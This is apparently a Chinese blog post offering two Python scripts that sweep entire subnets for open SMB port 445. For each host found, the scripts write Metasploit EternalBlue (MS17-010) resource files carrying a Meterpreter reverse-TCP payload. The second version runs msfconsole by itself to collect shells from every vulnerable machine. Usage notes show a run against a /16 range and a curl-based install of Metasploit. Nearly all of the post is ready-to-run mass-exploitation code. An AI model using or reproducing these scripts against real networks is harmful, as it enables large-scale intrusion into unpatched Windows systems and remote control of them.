摘要:python3调用msf和nmap批量扫描永恒之蓝

扫描脚本版本

# -*- coding:utf8 -*-
from threading import Thread
import nmap
import optparse
import os
from IPy import IP

# 根据参数拆分target
def find_target(target, num, countofip, count):
    fenge = int(countofip / count)
    start = fenge * (num - 1)
    end = fenge * num
    if end > countofip:
        end = countofip
    for host in target[start:end]:
        host = str(host)
        scanner = nmap.PortScanner()
        rst = scanner.scan(host, '445')
        if rst['nmap']['scanstats']['uphosts'] == '0':
            print("thread"+str(num)+":"+'Host not up:' + host)
            continue
        state = rst['scan'][host]['tcp'][445]['state']
        if state == 'open':
            print("thread"+str(num)+":"+str(host) + ' with 445 port open, there may be a vulnerability in ms17_010')
            saveip(num, host)
        else:
            print("thread"+str(num)+":"+str(host) + ' 445 port not open!')
            continue     


def create_file(configfile, host):
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configfile.write('set rhost ' + host + '\n')
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    lport = 4444 + int(host.split('.')[-1]) + int(host.split('.')[-2])
    configfile.write('set lport ' + str(lport) + '\n')
    configfile.write('set lhost ' + str(lhost) + '\n')
    configfile.write('exploit -j -z\n')
    print("Your shell will created at " + str(lhost) + ":" + str(lport))


# 保存ip
def saveip(num, host):
    configfile = open('meta' + str(num) + '.rc', 'a')
    create_file(configfile, host)
    configfile.close()


def main():
    parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
    parser.add_option('-H', dest='host', type='string')
    parser.add_option('-L', dest='lhost', type='string')
    parser.add_option('-C', dest='count', type='int')
    (options, args) = parser.parse_args()
    host = options.host
    global lhost
    lhost = options.lhost
    count = options.count
    countofthread = []
    target = IP(host)
    countofip = target.len()
    if host == None:
        parser.print_help()
        exit(0)
    countofthread.append("thread0")
    for i in range(1, count+1):
        countofthread.append("thread" + str(i))

    for i in range(1, count+1):
        countofthread[i] = Thread(target=find_target, args=(target, i, countofip, count,))
        countofthread[i].start()


if __name__ == '__main__':
    main()


使用说明:


需要先安装pip3 install python-nmap,pip3 install IPy这几个包


root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3为线程数,3为同时使用三个线程

扫描结果保存在形如meta1.rc,meta2.rc的文件中。文件的数量等于使用的线程数。

扫描脚本&&获取shell版本

# -*- coding:utf8 -*-
from threading import Thread
import nmap
import optparse
import os
from IPy import IP


# 根据参数拆分target
def find_target(target, num, countofip, count):
    fenge = int(countofip / count)
    start = fenge * (num - 1)
    end = fenge * num
    if end > countofip:
        end = countofip
    for host in target[start:end]:
        host = str(host)
        scanner = nmap.PortScanner()
        rst = scanner.scan(host, '445')
        if rst['nmap']['scanstats']['uphosts'] == '0':
            print("thread"+str(num)+":"+'Host not up:' + host)
            continue
        state = rst['scan'][host]['tcp'][445]['state']
        if state == 'open':
            print("thread"+str(num)+":"+str(host) + ' with 445 port open, there may be a vulnerability in ms17_010')
            saveip(num, host)
        else:
            print("thread"+str(num)+":"+str(host) + ' 445 port not open!')
            continue     


def create_file(configfile, host):
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configfile.write('set rhost ' + host + '\n')
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    lport = 4444 + int(host.split('.')[-1]) + int(host.split('.')[-2])
    configfile.write('set lport ' + str(lport) + '\n')
    configfile.write('set lhost ' + str(lhost) + '\n')
    configfile.write('exploit -j -z\n')
    print("Your shell will created at " + str(lhost) + ":" + str(lport))


# 保存ip
def saveip(num, host):
    configfile = open('meta' + str(num) + '.rc', 'a')
    create_file(configfile, host)
    configfile.close()


def merge(count):
    f1= open("meta1.rc", 'a')
    for i in range(2, count+1):
        if count==1 :
            break
        f2=open("meta"+str(i)+".rc", 'a')
        f2.close()
        with open("meta"+str(i)+".rc", 'r') as f2:
            for i in f2:
                f1.write(i)

def main():
    parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
    parser.add_option('-H', dest='host', type='string')
    parser.add_option('-L', dest='lhost', type='string')
    parser.add_option('-C', dest='count', type='int')
    (options, args) = parser.parse_args()
    host = options.host
    global lhost
    lhost = options.lhost
    count = options.count
    countofthread = []
    target = IP(host)
    countofip = target.len()
    if host == None:
        parser.print_help()
        exit(0)
    countofthread.append("thread0")
    for i in range(1, count+1):
        countofthread.append("thread" + str(i))

    for i in range(1, count+1):
        countofthread[i] = Thread(target=find_target, args=(target, i, countofip, count,))
        countofthread[i].start()
    for i in range(1, count+1):
        countofthread[i].join() 
           
    merge(count)
    command='msfconsole -r meta1.rc'
    os.system(command)

if __name__ == '__main__':
    main()

使用说明:


需要先安装pip3 install python-nmap,pip3 install IPy这几个包以及安装msf

安装msf命令:
root@ubuntufree:~#curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3为线程数,3为同时使用三个线程

扫描结果保存在meta1.rc的文件中。可以在msf中使用sessions查看已经获得的shell

源码文件.rar

文章目录